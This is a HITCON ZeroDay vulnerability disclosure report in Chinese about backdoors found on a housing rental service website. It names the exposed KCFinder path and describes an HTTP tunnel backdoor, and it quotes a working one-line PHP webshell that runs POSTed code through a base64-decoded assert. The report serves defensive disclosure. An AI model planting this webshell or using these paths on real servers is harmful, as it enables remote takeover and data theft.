板橋浮洲合宜住宅存在後門檔案 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00960
  •  發信 Vendor: 板橋浮洲合宜住宅租賃服務中心
  • Title: 板橋浮洲合宜住宅存在後門檔案
  • Introduction: 存在後門檔案

處理狀態

目前狀態

公開
Last Update : 2025/10/12
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2025/08/12 14:43:30 : 新提交 (由 YoFat 更新此狀態)
  • 2025/08/14 21:28:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/08/26 15:52:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/08/26 15:52:45 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/08/26 15:52:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/10/12 03:00:13 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2025-00960
  • 通報者:yofatyozi (YoFat)
  • 風險:嚴重
  • 類型:疑似遭入侵 (Probably Hacked)

參考資料

伺服器遭到入侵,例如頁面遭植入惡意程式、後門頁面等。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.perfectlife.com.tw/js/lib/ckeditor/config.js
https://www.perfectlife.com.tw/js/lib/kcfinder/browse.php?opener=ckeditor&type=images

敘述

漏洞種類

存有後門程式

重現漏洞方式

  1. 透過這個漏洞 https://zeroday.hitcon.org/vulnerability/ZD-2025-00958 發現 config.js
  2. 在 config.js 中發現兩個路徑,其中 /js/lib/kcfinder/browse.php?opener=ckeditor&type=images 可以訪問
  3. 在裡面發現兩個不同的後門 php 檔案

後門 A:HTTP 隧道/代理型後門(tunnel.php)

特徵:使用自訂 HTTP Header(如 Gzoubgmfjklurzs、Daskuw)收送命令;自定 Base64 字元表;以 PHP sockets 與 Session 緩衝維持雙向通道,能對任意 target:port 建立轉發。

後門 B:一行馬 RCE(c4461b30b84ee35cd2ce3c1f6477c6a7.php)

代碼片段:<?php $x=base64_decode("YXNzZXJ0"); $x($_POST['shadowsocks']);?>
行為:透過 POST 參數 shadowsocks 即可執行任意 PHP 表達式(等同 assert() RCE),屬典型 WebShell。

影響

系統接管風險:

  1. 後門 A 可將伺服器作為跳板,與外部主機建立 TCP 隧道,進行橫向移動、掃描、資料外流與持久控制。
  2. 後門 B 可透過 HTTP POST 直接在伺服器上執行任意 PHP 程式碼(RCE)。
  3. 機密性與完整性:攻擊者可讀取/竄改網站檔案、存取資料庫與憑證(.env、API 金鑰、SMTP、DB 帳密),並植入更多後門。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;